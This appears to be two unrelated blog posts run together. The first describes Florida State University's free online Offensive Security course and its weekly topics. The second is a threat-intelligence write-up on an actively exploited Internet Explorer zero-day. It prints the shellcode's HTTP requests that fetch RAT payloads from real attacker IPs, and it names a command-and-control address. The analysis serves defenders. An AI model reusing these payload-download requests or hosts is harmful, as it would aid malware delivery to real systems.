This past spring Prof. Xiuwen Liu and W. Owen Redwood taught the first of their Offensive Security classes at Florida State University. Courses like this are nothing new but the difference here is that they put the entire thing online … syllabus, videos, slides, assignments and all.

Included are 15 weeks of very technical content (about 20 actual 1 hour lectures and/or associated slides). Beyond the two books recommended in the syllabus (“Counter Hack Reloaded” by Ed Skoudis and Tom Liston and “Hacking: The Art of Exploitation, 2nd Edition” by Jon Erickson) the entire class is free.

I didn’t have a chance to go through the complete course but did spot check a few of the videos. Audio and video were of good quality and easy to follow. They plan on evolving this course over time each spring so expect content to improve from year to year. Also one thing to note … this class is not related to Offensive Security, the organization that maintains Backtrack and Kali Linux.

To wet your palate of what to expect here’s an embedded video of their Metasploit lecture as well as a quick overview of the topics covered each week.

• Week 1 Intro/Overview: Intro, Ethics, & Overview; Linux Overview
• Week 2 Overview/Code Auditing: Windows Overview; Rootkits; Code Auditing
• Week 3 Reverse Engineering Workshop Week: x86 Reverse engineering
• Week 4 Exploit Dev: Fuzzing/Exploit Dev 101; Shellcode/Exploit Dev 102
• Week 5 Exploit Dev / Networking: Exploit Dev 103 (SEH Exploitation, Heap Sprays, and Executable Security Mechanisms); Networking 101 (Data Layer, Link Layer, and IP layer)
• Week 6 Networking / Web App Hacking: Networking 102 (TCP layer, Important Protocols, Services, Portscanning, ARP); Web App Hacking 101
• Week 7 Web App Hacking: Web App Hacking 102 (SQLi, XSS); Web App Hacking 103 (SSL attacks, adv techniques)
• Week 8 Web App Hacking / Exploit Dev: Web App Hacking 104 & Exploit Dev 104; Midterm review & Exploit Dev 105 (ROP)
• Week 9 Special Topics: Modern History of Cyber Warfare; Social Engineering
• Week 10 Metaspl0it: Metasploit & Midterm
• Week 11 Post Exploitation/Forensics: Meterpreter/Post Exploitation; Volatility/IR
• Week 12 Physical Security: Lockpicking, USB mischief, & BacNET/SCADA security
• Week 13 Malware / Student Presentations
• Weeks 14 & 16: Student Presentations

To find out more on the FSU Offensive Security class, checkout their course site atoffsec.noleptr.com.

#####

Today’s post pic is from FSU.edu. See ya!

Yesterday, Microsoft released the June 2012 Black Tuesday Update including patches for a vulnerability affecting a wide range versions of Internet Explorer. The exploit works across different Windows versions ranging from XP to Windows 7.

The 0day has been actively exploited as reported by mcafee.

We have been able to find several servers hosting similar versions of the exploit. One of them was detected by our OTX system a couple of days ago:

http://labs.alienvault.com/labs/index.php/projects/open-source-ip-reputation-portal/information-about-ip/?ip=113.10.241.239

The exploit supports a wide range of languages and Windows versions and seems to be very reliable.

The exploit includes return-oriented programming (ROP) techniques that helps bypassing OS protections.

The shellcode downloads the payload from the following url:

GET /javaw.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: 113.10.241.239
Connection: Keep-Alive

https://www.virustotal.com/file/705cf0c95f7f0d351d480df4b48f723c7f72ce4e16b14a3a52f99081707e5a32/analysis/

A couple of days ago the AV detection rate was 3/41.

Other versions of the exploit have been found in different servers requesting the following payloads:

GET /english/cala.exe HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: 140.109.236.143
Connection: Keep-Alive

and

GET /img/books.cab HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: www.villagXXXX
Connection: Keep-Alive

https://www.virustotal.com/file/1581c0555956f7f62c717e303b6f8785207f107fbb4e375c1e50788d9a4a2f07/analysis/

The payloads seems to be RAT (Remote Access Tools).

The C&C server for that RAT is online (ip address 219.90.117.132)

219.90.117.128 – 219.90.117.159
China Shenzhen Soul Tech Co. Ltd

We will release more information as soon as we analyze the components involved on this attack.